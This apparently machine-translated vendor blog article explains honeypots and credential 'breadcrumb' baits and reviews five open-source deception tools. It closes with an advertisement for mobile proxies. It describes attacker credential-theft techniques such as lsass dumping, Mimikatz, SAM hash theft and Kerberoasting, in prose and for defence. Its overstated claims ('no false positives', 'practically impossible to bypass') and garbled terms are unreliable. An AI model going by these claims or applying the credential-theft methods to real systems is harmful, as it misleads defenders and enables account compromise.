Baits as an effective tool in detecting attacks with credential theft

Hacker attacks are a serious problem for both the average user and corporate networks. This is something that can cause serious harm to any device and an individual. They are fraught with the penetration of malware on the user's device, theft of credentials and other particularly sensitive information and many other extremely negative consequences. And it is clear that absolutely every user thinks about how to counteract this.

But here everything is not as simple as it might seem at first glance. Recently, most hacker attacks are based on social engineering tools. Attackers have learned to forge letters that are sent via email, online store pages, social network accounts and even full-fledged websites. All this pursues one goal - to launch malware on the user's device or to make the user register on the platform, indicating their authentication data. That is, there is a banal deception of people.

In turn, in order to counter such hacker attacks, the modern IT technology market began to use specialized traps and baits to identify illegal activities in a particular network. The essence is to create a competently distributed network of false data, assets within the infrastructure. This is the so-called Deception technology (literally translated as “deception”), which is designed to deceive the hackers themselves and identify their presence within a particular network. That is, an offer is made that will certainly interest the intruders. And as soon as he “falls for” this, the system immediately identifies him.

In today's review, we will talk about what modern cyber deception systems (Distributed Deception Platform) are based on traps and baits. We will tell you how these technologies work, what are the distinctive features of traps and baits. We will highlight the main methods of research and obtaining data on a compromised host, as well as what the client receives thanks to their use. We will get acquainted with the TOP-5 tools that can be used to create baits. We will provide a number of recommendations that will help to perform these works as correctly as possible.

Traps and baits: how these methods work

In the field of information security, such a tool as Honeypot has been used for quite a long time. If the name is literally translated from English, then we get a "honey pot". This is one of the most common types of traps, which are false targets that are supposed to attract the attention of an Internet attacker. It turns out that a hacker attacks such a bait, thereby identifying himself and giving the information security department employees the opportunity to take appropriate measures and stop his malicious action.

This technology first appeared in the 90s of the last century, having demonstrated its fairly good efficiency in practice. Gradually, it developed, improved, other tools and methods were introduced into it. Today, an advanced cyber deception technique, namely Distributed Deception Platform, which is also called a bait, has been actively used in practice.

So what is the point of using false targets in practice? The fact is that in this case we are talking about a very tempting offer for an attacker, which he clearly cannot pass by. As a result, by attacking such baits, a hacker simply gives himself away. All his actions are recorded and transferred to the information security service for subsequent analysis, identification of patterns and a more in-depth study of the incident. Thanks to this, specialists will be able to increase the resistance of the internal security system to other similar attacks. That is, the hacker will not be able to use the same technology again: it simply will not produce the desired results. That is, the organization will not be harmed.

In theory, this method seems quite effective, but still there are a number of shortcomings, which led to the fact that specialists began to actively work on its improvement. In particular, the main difficulty is that each false target must be configured individually. At the same time, they will not interact with all other elements of the network. And this means that there is a chance that the hacker will not notice your decoy at all, but will attack real targets. It was this weak point in this technology that was eliminated in the Deception technology. As a result, specialists managed to create a distributed deception platform, which today has become one of the most advanced tools in preventing cyberattacks on corporate networks.

Deception is a technology that belongs to the class of intrusion detection systems and is designed directly to identify such actions by intruders. In comparison with other methods related to the same class, modern baits are capable of not only identifying penetration, but also minimizing the damage that the actions of intruders can cause to a business.

It turns out that in the process of implementing this method, a fairly large network of false objects is created that will closely resemble the real network infrastructure. Here, network processes and events are simulated, traffic is launched, some users are added and others are removed. The only difference between such baits and a real working network is that all the processes occurring here have nothing to do with real ones, that is, they do not affect the operability of the main network. Moreover, only intruders are allowed to interact with them. Ordinary users, including company employees, will not be able to connect to it. Therefore, as soon as a message is received that someone has started working with a decoy network, this will immediately indicate the actions of the intruder, that is, the attack in progress.

Among other distinctive features of Deception technology, which can rightfully be attributed to its advantages, we highlight:

• The ability to create any fake elements. These can be both computers of ordinary network users, and servers, specialized applications that your business uses in practice. It is also possible to emulate the operation of specialized devices, such as medical equipment, smart devices, various sensors, POS terminals. That is, it is possible to form a fairly large network, including a huge variety of traps, which will look as natural as possible to the intruder. He will not be able to determine what exactly is in front of him: a real network or a decoy.
• Use of machine learning tools in baits, artificial intelligence and many other modern technologies. This is what allows you to create fairly realistic systems regardless of the niche in which a given enterprise operates, what size its local network is. Alternatively, a financial institution will be able to easily imitate the infrastructure of banks, including the operation of ATMs and terminals. A company specializing in software development will be able to imitate the operation of servers and the applications themselves. This is precisely what experts note as the key advantage of Deception solutions. Their innovativeness has led to the fact that Internet attackers are unable to overcome such barriers, at least for today.
• The ability to imitate not only the operation of devices and software products, but also false information. This includes databases, connection history, confidential documents, as well as sets of accounts, including logins and passwords to them. Such baits are called "breadcrumbs". With their help, the most realistic fake infrastructure is created, capable of confusing the hacker, confusing him and forcing him to make efforts to attack the dummy. As a result, such networks become a fairly powerful barrier to a hacker's penetration into your real, working network.
• Solutions based on this technology can work together with agent programs or even without them. But in practice, both solutions 1 and 2 can be used. In this case, specialized agent applications are installed on real user devices, server equipment in order to collect information about their state, but at the same time emulate network activity. They will also be able to respond to external incidents and perform a number of additional tasks.
• Such fictitious systems are managed from one device. All reports on potential intrusions and visual actions will also be sent here. As soon as the bait is attacked, the system will instantly send a notification to the administrator, as well as all the accompanying information. It will indicate which ports, protocols and addresses the intruder used, at what time the intrusion was detected, and much more. At the same time, you will be able to respond to such incidents both manually and automatically, having previously set the appropriate settings.

These features allow us to confidently state that properly organized and built baits are capable of quite effectively resisting hacker attacks at any stage of the intrusion, especially at the beginning, when the attacker's key advantage is surprise. As soon as he hits a false target, he moves further into the wilds of the false infrastructure, identifies himself, giving the information security department employees enough time to take appropriate measures and repel a real attack.

Features of baits

Baits, which in the English-speaking segment are called “breadcrumbs”, “lures”, “bait”, are the data that arouse increased interest among attackers. They can be distributed to the end devices of the company's servers, real users. As we have already mentioned above, in some cases an agent can also be used here, which will be able to notice the actions of the attacker and inform about it. But there is one significant nuance here: its use provides an additional load on the infrastructure, and if the hacker detects it, he can disable it. Therefore, many specialists who use this technique in practice still rely on agentless systems.

In most cases, the following can be used as bait:

1. Files in various formats, such as doc, pdf. Mostly, they contain knowingly false confidential information. Alternatively, this can be a file containing the login and password for accessing key network systems.
2. Scientific data that was saved in RDP sessions, browsers, LDAP directories, the UZ storage manager and any other end devices.
3. Settings in certain systems that were knowingly entered incorrectly. We are talking about those components that are most often tracked by attackers.
4. The command line history of a particular user, as well as many other data that will look quite natural to an attacker, but they will have no relation to reality.

We will repeat once again that today baits play a very important role in cyber deception systems. This is due to the fact that most attacks are aimed directly at end user devices. In the event that a hacker gains initial access to a company's local network, his attention will be focused on finding artifacts or other information that will allow him to gain a foothold on a compromised host, thereby increasing his own privileges. Such data is mainly logins and passwords for access, user accounts, and with different access rights.

In this case, the elevation of privileges can be horizontal or vertical. In the first case, the attacker will expand their access by capturing other training sites, in particular those with higher access rights. This will allow them to penetrate the system more deeply. In the case of vertical privilege escalation, a compromised regular user account will be used, and then the attacker will try to get root access or administrative rights.

But, regardless of which option the hacker chooses, there is a high probability that he will fall for the bait, that is, he will show himself, and as a result - will not get the desired access to the real network.

Research options and obtaining credentials on a compromised host

Detecting cyberattacks using baits is a way to stop the actions of an intruder, lead him into a dead end, prevent him from taking the next step, which will no longer be aimed at false information, but at real data. But in order for all this to give the desired results in practice, it is very important to very carefully examine each action of the intruders and think about which nodes and elements his attention can be focused on. In this case, the following methods and tools can be used:

• Dump of credentials. It is performed from the processor memory of lsass.exe. This is where the credentials of all user devices will be stored along with their active sessions in the Windows operating system.
• Search for logins and passwords for access in various files, services. Alternatively, users often store data about their accounts in instant messengers, inside email correspondence, regular text files, etc.
• Extracting valid credentials from the device's memory in the form of Kerberos tickets, passwords, NTLM hashes, and many other tools. Alternatively, fairly popular utilities like Mimikatz can be detected even by classic antivirus programs, EDR and XDR solutions. To hide this, attackers often launch clones with maximum functionality, re-equipping them each time.
• Stealing NTLM password hashes directly from the Security Accounts Manager database located on the local hard drive, as well as from the Windows Credential Manager.
• Searching for certificates and specialized VPN profiles that allow you to connect to hosts running Windows and Linux operating systems.
• Stealing confidential information using the Kerberos protocol (the technology is called Kerberoasting), which plays a very important role in the process of authentication and requesting access to internal services and applications. The Single-Sign-On option is implemented here, allowing access to a number of shared resources located within the corporate network.
• Search for information that can be used by an attacker when developing subsequent hacking strategies in the cron or systemd scheduler, bash history.

It turns out that in the case when you use baits, you can prevent the attacker from further actions. He will most likely find decoys and try to use them, without even suspecting that he literally stepped on a mine. But at the same time, the baits are completely invisible to ordinary users and will not affect the efficiency and quality of their work in any way.

What will be the result of using baits in practice

The first thing that everyone who decides to implement Deception solutions in their corporate network gets is fairly high rates of protection against hacker influence and the introduction of malicious software in combination with the prompt detection of hacker attacks. Practice has shown that such systems are practically impossible to bypass, since the hacker does not understand until the very end that he is working with a bait, and not with a real network or user device. Moreover, there are no false positives, as can happen in the case of using other modern security systems. This means that your information security specialists will not waste their own time and effort in vain. They will clearly understand that there is an attempt to hack and will be able to react to it immediately.

If desired, you can integrate the decoy technology into other security systems that you use in your corporate environment without fear of software or hardware conflicts. This will make the protection of the local network from the actions of an intruder even more powerful and reliable.

An additional benefit for business from the implementation of Deception technology is that it is possible to identify all this and prevent hacker actions at an early stage. Most intruders do not take very serious actions at this stage. They initially collect information, get acquainted with your network and perform a number of other actions that will not cause serious damage to the business, will not be able to compromise the real infrastructure. This is why this technology has received such wide application in practice today. Leading experts consider it the most reliable and effective means in the fight against hacker attacks aimed at stealing confidential information and user credentials. It will also be able to counteract ransomware viruses.

The deployment and subsequent maintenance of such systems are quite simple. There is no need to connect additional physical equipment, which also minimizes material costs. They are installed as software and then configured taking into account the specifics of a particular system. In further operation, they will require a minimum of resources, hardware, that is, their actions will not affect the performance of the device.

It is convenient that even before launch, you can simply implement this product in your network and test it. This way, you can understand how it works within your infrastructure, evaluate its effectiveness. And based on this data, you can make an appropriate decision about the purchase.

It is convenient that Deception solutions are endowed with high automation rates, which significantly reduces the workload of specialists. You only need to centrally configure this tool once, and then simply respond promptly to notifications that will come from the decoy system and take appropriate measures to counter the intruders.

Tools and methods for creating baits

If you analyze all the tools and solutions that are used today by specialists to create such baits, then the simplest option here will be the creation of fake accounts, such as in Active Directory. But here it is important to understand that they will provide protection exclusively for this service. Then you simply connect the audit and track all attempts at illegal authentication. But if we are talking about creating a global security system, then you can use specialized tools. Their choice is quite wide and along with paid ones, there are also free products. Here are just a few of the most common options:

1. CanaryTokens. An extremely popular Open Source project that allows you to create different types of baits within the infrastructure. This product is supported by Thinkst Corporation. With its help, you can create a false trigger via the web console. These can be documents in .doc and .pdf formats, DNS resolvers, URL links, email addresses, QR codes from network or physical infrastructure, MySQL databases, operating system commands, as well as various applications, including those designed for installation on smartphones, tablets running iOS and Android. Such baits are placed on working user hostings, in databases, project management systems, CI/CD pipelines, code repositories, etc. They will send notifications about unauthorized access to the email that you specify during the settings. Here, the token name, timestamp, and IP-address of the device from which the impact is made will be indicated without fail. But we would like to draw attention to the fact that there is no built-in tool for collecting telemetry data, there is no system for integrated management of all baits.
2. Cowrie. Quite a popular bait in the Open Source SSH/Telnet sphere. With its help, it will be possible to emulate various vulnerabilities, incorrect configurations of SSH services, file systems, including those that contain quite realistic files, directories. It has its own file system, with the help of which it is possible to create a false structure that will be very similar in appearance to the natural one, and in the context of a certain organization. The system will also record the actions of the attacker, including the commands executed, file manipulation, attempts to log in to the system during actions with the trap. Notifications will be sent to e-mail in messengers depending on the previously configured settings. The system can interact with the attacker, using fake reporting data, pre-thought-out commands and responses. This is what will allow you to create an environment that will look as natural as possible to a hacker and will not arouse his suspicions. It provides support for protocols such as SSH, SCP, SFTP, TELNET.
3. Honeyd. A low-interaction product that can simulate the operation of various operating systems, replace SSH banners, and respond to shell commands. With its help, you can launch a huge number of virtual devices on the network, but the only thing you need to take into account is that in this case the MAC address will be the same. This system not only identifies the actions of an intruder, but also collects a certain large set of information about him, in particular all the data on logging into the system, the commands he entered, the IP address of his device. Perhaps you will not get a complete picture of the hacker's concept, but you will still have basic information at your disposal. It supports a fairly large number of protocols, namely SSH, HTTPS, FTP, OS, TELNET, MTP.
4. DejaVU. One of the first Deception solutions that appeared on the market. It has an open source code and allows you to create baits that will be installed on real user hosts and company servers. In the boxed version, it supports only a few options. Allows you to deploy decoys not only on your internal network, but also in the cloud. Contains a number of advanced decoys, as well as breadcrumbs. With its help, you can deploy multiple server and client decoys on different VLANs. For more convenient and flexible management, a special Internet platform is provided here. Through it, you can administer and configure all decoys directly from a centralized console. Additionally, you can also configure how alerts should be displayed and processed. It is also possible to make other individual settings that take into account the specifics of the network you are going to work with. Alerts will be displayed only if an attacker interacts with your decoy. One of the most significant advantages in this case is that this solution uses a single platform to deploy even a complex network. As a result, management is significantly simplified and the level of control is increased.
5. Dionaea. Another product that can effectively detect malware by luring the attacker into traps and then checking it in an isolated environment using the built-in library. Based on the collected information, it will be possible to get the most detailed picture of the malware that was used during the attack. Here, information is collected such as the location of the remote node and its IP address, the credentials that were used to connect to the system, the time of such exposure and the frequency of such attempts, a list of files that were downloaded or uploaded. Messages to information security specialists can be sent in different formats depending on what was specified in the preliminary settings. It provides support for a huge number of protocols, including SMB, HTTPS, MSSQL, MySQL, TFP, BLACKHOLE, SIP, NTP, etc.

But is everything as simple in implementing baits as it may seem at first glance? No, but the negative aspects can be minimized if you know certain nuances.

Nuances of implementing baits that you need to know

In order for your baits to work as efficiently as possible, so that you can confidently say that your credentials are under reliable protection, you need to perform the upcoming work as correctly as possible. And here it is worth using the recommendations of specialists. In particular, the easiest way to set up baits is to use virtual machines. This solution will be ideal if you need to launch a fairly large network containing a huge number of traps. So it will not be a problem to form a chain of virtual machines that will work on one physical device. As a result, maintenance costs are minimized, the need to purchase expensive hardware is eliminated, and the result will be identical.

Also, when working with baits, you should understand the following points:

• Before deploying a server image, be sure to create a backup copy of it. This is what will allow you to perform recovery without problems if such a need arises.
• You should pay very serious attention to setting up the bait and entrust this work to specialists, since otherwise the attacker will be able to use existing vulnerabilities, including to penetrate other systems of your network, to launch attacks on third-party networks, including other organizations via the Internet.
• Make sure that the honeypots you create are not used by your staff in practice. Moreover, none of them should have access to them except for the administrators directly responsible for their operation. This is the only way to ensure high security indicators for the local network and not to harm the stable work process.
• It is important to beware of other types of false positives. We have already said that honeypots are not the technology where such a phenomenon can be encountered in practice. But there have already been cases where attackers pretended to attack the honeypot, but actually made a redirect. As a result, such attacks were identified by the system, and specialists were forced to spend time investigating false positives, while the attackers were simultaneously carrying out a real attack.
• Monitor the operation of the deceptive system in real time. This way, you can break the hacker's Internet connection if you see that there is a risk to your real local network.

It is also important to understand that you will need to additionally perform your own file system audit. In this case, it is important to set priorities correctly, create an accessible file resource that will contain information that looks valuable, but in fact has nothing to do with genuine data.

Summing up

In order to counteract various hacker attacks, the launch of malicious software, the modern IT technology market uses a fairly wide variety of tools. But one of the most effective solutions can rightfully be called cyber deception, based on the creation of bait for Internet intruders. We have described in as much detail as possible what it is and what its advantages are for various local networks. All you have to do is analyze this information and make the right, informed conclusions for yourself.

But in any case, you should understand that the likelihood of any unauthorized access will be minimized if you can reliably hide the real IP address of the user device. That is, this is the step that will not allow an intruder to access your computer, laptop or other gadget and run malicious software on it. One of the best solutions for implementing this idea is mobile proxies from the MobileProxy.Space service. They will reliably hide not only the IP address, but also the geolocation of your device, which will ultimately help ensure high levels of confidentiality and protection from any unauthorized access. They can also be used to bypass regional restrictions and access blocked services, sites, use multi-accounting, web scraping, and automate many routine, repetitive processes. And all this without the risk of getting banned or blocked by the system.

At the link https://mobileproxy.space/en/user.html?buyproxy you can learn more about what mobile proxy data is, evaluate the availability of tariffs, and learn about the available GEOs. There is also an opportunity to test the product for free before purchasing it for 2 hours. Take advantage of this offer to see how advanced and technologically advanced the solution can be at your disposal.

Share this article: